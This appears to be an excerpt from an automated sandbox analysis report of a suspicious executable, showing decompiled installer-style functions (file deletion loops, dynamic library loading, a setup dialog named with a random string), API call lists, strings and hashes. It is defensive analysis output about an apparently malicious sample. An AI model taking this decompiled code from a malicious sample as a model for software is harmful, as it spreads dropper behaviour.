                    						_a4 = _t37;
                    						if(_t37 == 0xffffffff) {
                    							L29:
                    							__eflags = _v8;
                    							if(_v8 != 0) {
                    								_t31 = _t70 - 1;
                    								 *_t31 =  *(_t70 - 1) & 0x00000000;
                    								__eflags =  *_t31;
                    							}
                    							goto L31;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							_t75 =  &(_v332.cFileName);
                    							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                    							__eflags =  *_t49;
                    							if( *_t49 != 0) {
                    								__eflags = _v332.cAlternateFileName;
                    								if(_v332.cAlternateFileName != 0) {
                    									_t75 =  &(_v332.cAlternateFileName);
                    								}
                    							}
                    							__eflags =  *_t75 - 0x2e;
                    							if( *_t75 != 0x2e) {
                    								L19:
                    								E0040592B(_t70, _t75);
                    								__eflags = _v332.dwFileAttributes & 0x00000010;
                    								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                    									E004055E3(_t72);
                    									_t52 = DeleteFileA(_t72);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E00404CC9(0xfffffff2, _t72);
                    									} else {
                    										__eflags = _a8 & 0x00000004;
                    										if((_a8 & 0x00000004) == 0) {
                    											 *0x42ebe8 =  *0x42ebe8 + 1;
                    										} else {
                    											E00404CC9(0xfffffff1, _t72);
                    											_push(0);
                    											_push(_t72);
                    											E00405679();
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E00405250(_t70, __eflags, _t72, _a8);
                    									}
                    								}
                    								goto L27;
                    							}
                    							_t61 =  *((intOrPtr*)(_t75 + 1));
                    							__eflags = _t61;
                    							if(_t61 == 0) {
                    								goto L27;
                    							}
                    							__eflags = _t61 - 0x2e;
                    							if(_t61 != 0x2e) {
                    								goto L19;
                    							}
                    							__eflags =  *((char*)(_t75 + 2));
                    							if( *((char*)(_t75 + 2)) == 0) {
                    								goto L27;
                    							}
                    							goto L19;
                    							L27:
                    							_t55 = FindNextFileA(_a4,  &_v332);
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t37 = FindClose(_a4);
                    						goto L29;
                    					}
                    					__eflags =  *0x42afe0 - 0x5c;
                    					if( *0x42afe0 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t37;
                    					if(_t37 == 0) {
                    						L31:
                    						__eflags = _v8;
                    						if(_v8 == 0) {
                    							L39:
                    							return _t37;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t37 = E00405C22(_t72);
                    							__eflags = _t37;
                    							if(_t37 == 0) {
                    								goto L39;
                    							}
                    							E0040541E(_t72);
                    							E004055E3(_t72);
                    							_t37 = RemoveDirectoryA(_t72);
                    							__eflags = _t37;
                    							if(_t37 != 0) {
                    								return E00404CC9(0xffffffe5, _t72);
                    							}
                    							__eflags = _a8 & 0x00000004;
                    							if((_a8 & 0x00000004) == 0) {
                    								goto L33;
                    							}
                    							E00404CC9(0xfffffff1, _t72);
                    							_push(0);
                    							_push(_t72);
                    							return E00405679();
                    						}
                    						L33:
                    						 *0x42ebe8 =  *0x42ebe8 + 1;
                    						return _t37;
                    					}
                    					__eflags = _a8 & 0x00000002;
                    					if((_a8 & 0x00000002) == 0) {
                    						goto L31;
                    					}
                    					goto L5;
                    				}
                    			}

                    • Instruction addresses (listing column detached by extraction): 0x0040525b to 0x0040541b

                    APIs
                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 0040526E
                    • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052B8
                    • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052D9
                    • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052DF
                    • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052F0
                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                    • FindClose.KERNEL32(?), ref: 004053B3
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                    • \*.*, xrefs: 004052B2
                    • "C:\Users\user\Desktop\U001P56ybm.exe" , xrefs: 0040525A
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                    • API String ID: 2035342205-1318752889
                    • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                    • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                    • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                    • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C49(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				CHAR* _t7;
                    				signed int _t9;
                    
                    				_t9 = _a4 << 3;
                    				_t7 =  *(_t9 + 0x4091f8);
                    				_t5 = GetModuleHandleA(_t7);
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                    				}
                    				_t5 = LoadLibraryA(_t7); // executed
                    				if(_t5 != 0) {
                    					goto L2;
                    				}
                    				return _t5;
                    			}

                    • Instruction addresses (listing column detached by extraction): 0x00405c51 to 0x00405c7f

                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                    • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                    • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                    • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                    • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C22(CHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x42c028;
                    			}

                    • Instruction addresses (listing column detached by extraction): 0x00405c2d to 0x00405c43

                    APIs
                    • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 00405C2D
                    • FindClose.KERNEL32(00000000), ref: 00405C39
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                    • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                    • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                    • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 1000BF6E
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$
S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                    • API String ID: 4275171209-4079164987
                    • Opcode ID: f2471703540d62f08c48e5e15e174bbe62e8b76e8fc67e5c299cf2417261d894
                    • Instruction ID: 0652af2c6b852cd72de7e3cc5b47842b286dd2b2d36711a57adbe5cdaea91348
                    • Opcode Fuzzy Hash: f2471703540d62f08c48e5e15e174bbe62e8b76e8fc67e5c299cf2417261d894
                    • Instruction Fuzzy Hash: A4144A1090DBEAC8EB32823C5C587CDAE611B23225F4843D9D1EC3A6D6C7B50B95DF66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                    				struct HWND__* _v32;
                    				void* _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t35;
                    				signed int _t37;
                    				signed int _t39;
                    				intOrPtr _t44;
                    				struct HWND__* _t49;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t115;
                    				signed int _t116;
                    				int _t117;
                    				signed int _t122;
                    				struct HWND__* _t125;
                    				struct HWND__* _t126;
                    				int _t127;
                    				long _t130;
                    				int _t132;
                    				int _t133;
                    				void* _t134;
                    				void* _t142;
                    
                    				_t115 = _a8;
                    				if(_t115 == 0x110 || _t115 == 0x408) {
                    					_t35 = _a12;
                    					_t125 = _a4;
                    					__eflags = _t115 - 0x110;
                    					 *0x429fbc = _t35;
                    					if(_t115 == 0x110) {
                    						 *0x42eb68 = _t125;
                    						 *0x429fd0 = GetDlgItem(_t125, 1);
                    						_t91 = GetDlgItem(_t125, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x428f98 = _t91;
                    						E00403CDD(_t125);
                    						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
                    						 *0x42e32c = E0040140B(4);
                    						_t35 = 1;
                    						__eflags = 1;
                    						 *0x429fbc = 1;
                    					}
                    					_t122 =  *0x40919c; // 0xffffffff
                    					_t133 = 0;
                    					_t130 = (_t122 << 6) +  *0x42eb80;
                    					__eflags = _t122;
                    					if(_t122 < 0) {
                    						L34:
                    						E00403D29(0x40b);
                    						while(1) {
                    							_t37 =  *0x429fbc;
                    							 *0x40919c =  *0x40919c + _t37;
                    							_t130 = _t130 + (_t37 << 6);
                    							_t39 =  *0x40919c; // 0xffffffff
                    							__eflags = _t39 -  *0x42eb84; // 0x2
                    							if(__eflags == 0) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x42e32c - _t133; // 0x0
                    							if(__eflags != 0) {
                    								break;
                    							}
                    							_t44 =  *0x42eb84; // 0x2
                    							__eflags =  *0x40919c - _t44; // 0xffffffff
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t116 =  *(_t130 + 0x14);
                    							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                    							_push( *((intOrPtr*)(_t130 + 0x20)));
                    							_push(0xfffffc19);
                    							E00403CDD(_t125);
                    							_push( *((intOrPtr*)(_t130 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E00403CDD(_t125);
                    							_push( *((intOrPtr*)(_t130 + 0x28)));
                    							_push(0xfffffc1a);
                    							E00403CDD(_t125);
                    							_t49 = GetDlgItem(_t125, 3);
                    							__eflags =  *0x42ebec - _t133; // 0x0
                    							_v32 = _t49;
                    							if(__eflags != 0) {
                    								_t116 = _t116 & 0x0000fefd | 0x00000004;
                    								__eflags = _t116;
                    							}
                    							ShowWindow(_t49, _t116 & 0x00000008);
                    							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                    							E00403CFF(_t116 & 0x00000002);
                    							_t117 = _t116 & 0x00000004;
                    							EnableWindow( *0x428f98, _t117);
                    							__eflags = _t117 - _t133;
                    							if(_t117 == _t133) {
                    								_push(1);
                    							} else {
                    								_push(_t133);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                    							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                    							__eflags =  *0x42ebec - _t133; // 0x0
                    							if(__eflags == 0) {
                    								_push( *0x429fd0);
                    							} else {
                    								SendMessageA(_t125, 0x401, 2, _t133);
                    								_push( *0x428f98);
                    							}
                    							E00403D12();
                    							E0040592B(0x429fd8, "foxdilaoqebdbpxrsdbw Setup");
                    							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                    							SetWindowTextA(_t125, 0x429fd8);
                    							_push(_t133);
                    							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t130 - _t133;
                    								if( *_t130 == _t133) {
                    									continue;
                    								}
                    								__eflags =  *(_t130 + 4) - 5;
                    								if( *(_t130 + 4) != 5) {
                    									DestroyWindow( *0x42e338);
                    									 *0x4297a8 = _t130;
                    									__eflags =  *_t130 - _t133;
                    									if( *_t130 <= _t133) {
                    										goto L58;
                    									}
                    									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                    									__eflags = _t73 - _t133;
                    									 *0x42e338 = _t73;
                    									if(_t73 == _t133) {
                    										goto L58;
                    									}
                    									_push( *((intOrPtr*)(_t130 + 0x2c)));
                    									_push(6);
                    									E00403CDD(_t73);
                    									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                    									ScreenToClient(_t125, _t134 + 0x10);
                    									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                    									_push(_t133);
                    									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                    									__eflags =  *0x42e32c - _t133; // 0x0
                    									if(__eflags != 0) {
                    										goto L61;
                    									}
                    									ShowWindow( *0x42e338, 8);
                    									E00403D29(0x405);
                    									goto L58;
                    								}
                    								__eflags =  *0x42ebec - _t133; // 0x0
                    								if(__eflags != 0) {
                    									goto L61;
                    								}
                    								__eflags =  *0x42ebe0 - _t133; // 0x0
                    								if(__eflags != 0) {
                    									continue;
                    								}
                    								goto L61;
                    							}
                    						}
                    						DestroyWindow( *0x42e338);
                    						 *0x42eb68 = _t133;
                    						EndDialog(_t125,  *0x4293a0);
                    						goto L58;
                    					} else {
                    						__eflags = _t35 - 1;
                    						if(_t35 != 1) {
                    							L33:
                    							__eflags =  *_t130 - _t133;
                    							if( *_t130 == _t133) {
                    								goto L61;
                    							}
                    							goto L34;
                    						}
                    						_push(0);
                    						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L33;
                    						}
                    						SendMessageA( *0x42e338, 0x40f, 0, 1);
                    						__eflags =  *0x42e32c - _t133; // 0x0
                    						return 0 | __eflags == 0x00000000;
                    					}
                    				} else {
                    					_t125 = _a4;
                    					_t133 = 0;
                    					if(_t115 == 0x47) {
                    						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                    					}
                    					if(_t115 == 5) {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                    					}
                    					if(_t115 != 0x40d) {
                    						__eflags = _t115 - 0x11;
                    						if(_t115 != 0x11) {
                    							__eflags = _t115 - 0x111;
                    							if(_t115 != 0x111) {
                    								L26:
                    								return E00403D44(_t115, _a12, _a16);
                    							}
                    							_t132 = _a12 & 0x0000ffff;
                    							_t126 = GetDlgItem(_t125, _t132);
                    							__eflags = _t126 - _t133;
                    							if(_t126 == _t133) {
                    								L13:
                    								__eflags = _t132 - 1;
                    								if(_t132 != 1) {
                    									__eflags = _t132 - 3;
                    									if(_t132 != 3) {
                    										_t127 = 2;
                    										__eflags = _t132 - _t127;
                    										if(_t132 != _t127) {
                    											L25:
                    											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                    											goto L26;
                    										}
                    										__eflags =  *0x42ebec - _t133; // 0x0
                    										if(__eflags == 0) {
                    											_t99 = E0040140B(3);
                    											__eflags = _t99;
                    											if(_t99 != 0) {
                    												goto L26;
                    											}
                    											 *0x4293a0 = 1;
                    											L21:
                    											_push(0x78);
                    											L22:
                    											E00403CB6();
                    											goto L26;
                    										}
                    										E0040140B(_t127);
                    										 *0x4293a0 = _t127;
                    										goto L21;
                    									}
                    									__eflags =  *0x40919c - _t133; // 0xffffffff
                    									if(__eflags <= 0) {
                    										goto L25;
                    									}
                    									_push(0xffffffff);
                    									goto L22;
                    								}
                    								_push(_t132);
                    								goto L22;
                    							}
                    							SendMessageA(_t126, 0xf3, _t133, _t133);
                    							_t103 = IsWindowEnabled(_t126);
                    							__eflags = _t103;
                    							if(_t103 == 0) {
                    								goto L61;
                    							}
                    							goto L13;
                    						}
                    						SetWindowLongA(_t125, _t133, _t133);
                    						return 1;
                    					} else {
                    						DestroyWindow( *0x42e338);
                    						 *0x42e338 = _a12;
                    						L58:
                    						if( *0x42afd8 == _t133) {
                    							_t142 =  *0x42e338 - _t133; // 0x0
                    							if(_t142 != 0) {
                    								ShowWindow(_t125, 0xa);
                    								 *0x42afd8 = 1;
                    							}
                    						}
                    						L61:
                    						return 0;
                    					}
                    				}
                    			}
                    Block addresses for the listing above range from 0x00403813 to 0x00403caa; the address of each API call is given in the APIs list below.

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                    • ShowWindow.USER32(?), ref: 00403863
                    • DestroyWindow.USER32 ref: 00403877
                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403893
                    • GetDlgItem.USER32 ref: 004038B4
                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                    • IsWindowEnabled.USER32(00000000), ref: 004038CF
                    • GetDlgItem.USER32 ref: 0040397D
                    • GetDlgItem.USER32 ref: 00403987
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                    • GetDlgItem.USER32 ref: 00403A98
                    • ShowWindow.USER32(00000000,?), ref: 00403AB9
                    • EnableWindow.USER32(?,?), ref: 00403ACB
                    • EnableWindow.USER32(?,?), ref: 00403AE6
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                    • EnableMenuItem.USER32 ref: 00403B03
                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                    • lstrlenA.KERNEL32(00429FD8,?,00429FD8,foxdilaoqebdbpxrsdbw Setup), ref: 00403B57
                    • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                    • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                    Strings
                    • foxdilaoqebdbpxrsdbw Setup, xrefs: 00403B48
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
